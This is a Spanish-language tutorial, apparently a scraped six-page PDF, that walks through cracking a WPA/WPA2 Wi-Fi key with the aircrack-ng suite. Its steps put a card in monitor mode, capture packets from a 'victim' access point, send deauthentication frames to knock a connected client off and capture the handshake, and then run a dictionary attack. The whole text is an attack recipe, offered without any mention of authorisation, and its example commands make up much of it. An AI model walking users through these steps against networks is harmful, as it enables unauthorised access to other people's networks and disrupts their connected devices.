Está en la página 1de 6

Cracking WPA/WPA2

By Driver MPX

Vamos a obtener la clave WPA/WPA2 de una red inalámbrica con sistema de clave
compartida. Tendremos que usar un diccionario y capturar un handshake, para lo cual
también se requiere que un cliente este asociado al AP en cuestión.

El handshake (o “apretón de manos”) se genera cuando un cliente se asocia al Access Point


(AP). Son los paquetes que se envían entre estos en el momento de la asociación. El
handshake es necesario para realizar este ataque.

Paso 1.

Poner la tarjeta en modo monitor.

Para saber que interface vamos a usar ponemos:

#ifconfig

Para poner nuestra interface en modo monitor:

#airmon-ng start <interfaz>

http://masterpassx.net/
http://driverinside.blogspot.com Página 1
En mi caso:

#airmon-ng start wlan0

Paso 2.

Utilizar airodump-ng para ver los AP disponibles.

#airodump-ng <interfaz>

#airodump-ng mon0

*Recordar que en el paso anterior se creó una nueva interfaz en modo monitor.

http://masterpassx.net/
http://driverinside.blogspot.com Página 2
Con airodump podemos ver entre otras cosas:

1. Los nombres de los AP disponibles o ESSID.


2. Las MAC de los AP o BSSID (o simplemente SSID).
3. Protección o encriptado.
4. Canal en que transmiten.
5. Los clientes asociados a los AP.

Una vez que sabemos el BSSID (MAC address) y el canal en el que transmite el AP,
debemos capturar paquetes.

Paso 3.

Capturar paquetes.

#airodump-ng -w nombreArchivo -c # <interfaz>

Donde:

nombreArchivo Es el nombre del archivo donde se guardarán los paquetes capturados.


# es el nùmero de canal en el que transmite el AP.

Ejemplo:

# airodump-ng –w wpaMPX –c 6 mon0

http://masterpassx.net/
http://driverinside.blogspot.com Página 3
También podemos ser más específicos, indicando que capture solo los paquetes de un AP en
particular.

#airodump-ng --bssid XX:XX:XX:XX:XX:XX -c # -w nombreArchivo <interfaz>

Donde:

XX:XX:XX:XX:XX:XX es la MAC address del AP.


# es el numero de canal del AP
nombreArchivo es el nombre del archivo donde se guardarán los paquetes capturados.
<interfaz> es la interface en modo monitor.

Ejemplo:

# airodump-ng --bssid 99:88:77:66:55:44 -c 6 -w wpaMPX mon0

En este caso sólo capturará los paquetes del AP con MAC address 99:88:77:66:55:44.

Paso 4

Capturar el Handshake.

Como vemos, hay un cliente asociado al AP víctima. ¡Qué suerte! :P Sin embargo debemos
capturar el handshake en la asociación entre estos, por lo que necesitamos que se vuelvan a
asociar.

Para ello debemos deautenticar al cliente.

(En otra terminal)

# aireplay-ng -0 # -a XX:XX:XX:XX:XX:XX -c YY:YY:YY:YY:YY:YY <interfaz>

Donde:

# número de deautenticaciones que mandaremos, en caso de poner 0 (cero) las seguirá


mandando hasta que lo paremos (Ctrl + C).

XX:XX:XX:XX:XX:XX MAC del AP.


YY:YY:YY:YY:YY:YY MAC del cliente.
Ejemplo:

#aireplay-ng -0 3 -a 99:88:77:66:55:44 -c 00:11:22:33:44:55 mon0

Cuando se ejecute esto se debe ver algo como esto:

http://masterpassx.net/
http://driverinside.blogspot.com Página 4
En este punto ya debemos tener capturado el handshake (archivo .cap) y como en el ataque
a WEP vamos a usar aircrack-ng y el diccionario.

Paso 5.

Ataque de diccionario.

Para ello debemos usar un diccionario o wordlist single (no de combos user:pass como los
que se usan para web cracking).

# aircrack-ng -w <rutaDiccionario> <archivoCaptura>

Ejemplo:

# aircrack-ng -w diccionario.txt wpaMPX-01.cap

Indicamos el índice, es decir el que tenga capturado el handshake.


Si hubiésemos especificado la MAC address de un AP en particular en el paso 3 no sería
necesario indicar el índice.

*También podría ser diccionario.lst o el archivo en texto plano que tenga la lista de palabras
que vayamos a utilizar. Yo ocupé una wordlist que ocupaba para los ataques de web
cracking.

http://masterpassx.net/
http://driverinside.blogspot.com Página 5
Y el resultado sería:

Para realizar este ejemplo, se ve que la clave existía en el diccionario y que estaba en las
primeras posiciones, pero los que ya hayan hecho un ataque con diccionarios sabrán que la
duración de estos ataques puede depender de la calidad de nuestra wordlist.

http://masterpassx.net/
http://driverinside.blogspot.com Página 6

También podría gustarte